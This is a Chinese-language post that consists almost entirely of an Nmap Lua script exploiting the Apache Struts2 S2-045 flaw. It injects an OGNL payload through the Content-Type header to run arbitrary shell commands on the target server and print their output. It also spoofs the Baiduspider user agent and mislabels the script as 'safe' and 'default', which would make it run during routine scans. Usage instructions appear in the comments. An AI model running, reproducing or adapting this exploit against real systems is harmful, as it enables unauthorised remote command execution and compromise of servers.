nmap下的poc脚本

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"

-- 作者
author = "k4n5ha0"
-- 授权
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- 分类
categories = {"safe", "default"}
-- 端口和服务
portrule = shortport.http

-- trim函数
function trim(s)
    return (s:gsub("^%s*(.-)%s*$", "%1"))
end

function st2exp_generate_http_req(host, port, uri, cmd)
    -- 设置 HTTP headers
    local options = {header = {}}
    options["no_cache"] = true
    -- 构造UA为百度爬虫
    options["header"]["User-Agent"] =
        "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html"
    -- 构造payload
    options["header"]["Content-Type"] =
        "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" ..
        cmd ..
            "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    -- 如果需要cookie 可以这么构造 先留着例子  options["header"]["Cookie"] = cmd
    local req = http.get(host, port, uri, options)
    -- PrintTable(req)
    -- stdnse.debug1("接受 '%s' in HTTP", PrintTable(req))
    print("exploit!!!!!!!!\n----------->>>>:\n\n"..trim(req.fragment).."\n\n<<<<-----------")
    return req
end

-- 使用教程
-- 把本脚本放到 nmap的scripts文件夹 linux在/usr/local/share/nmap/scripts/下面
-- nmap --script st-045.lua --script-args uri=/showcase.action,cmd=id -p 8080  127.0.0.1
action = function(host, port)
	-- 执行的命令 默认是 whoami windows和linux都能执行
    local cmd = stdnse.get_script_args(SCRIPT_NAME .. ".cmd") or "whomai"
    -- local http_header = stdnse.get_script_args(SCRIPT_NAME .. ".header") or nil
    local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/index.action"
    local req = st2exp_generate_http_req(host, port, uri, cmd)
    -- stdnse.debug1("Response '%s' in HTTP!", req.body)
end
nmap -d 可以看到 stdnse.debug1的输出支持中文
猜你喜欢
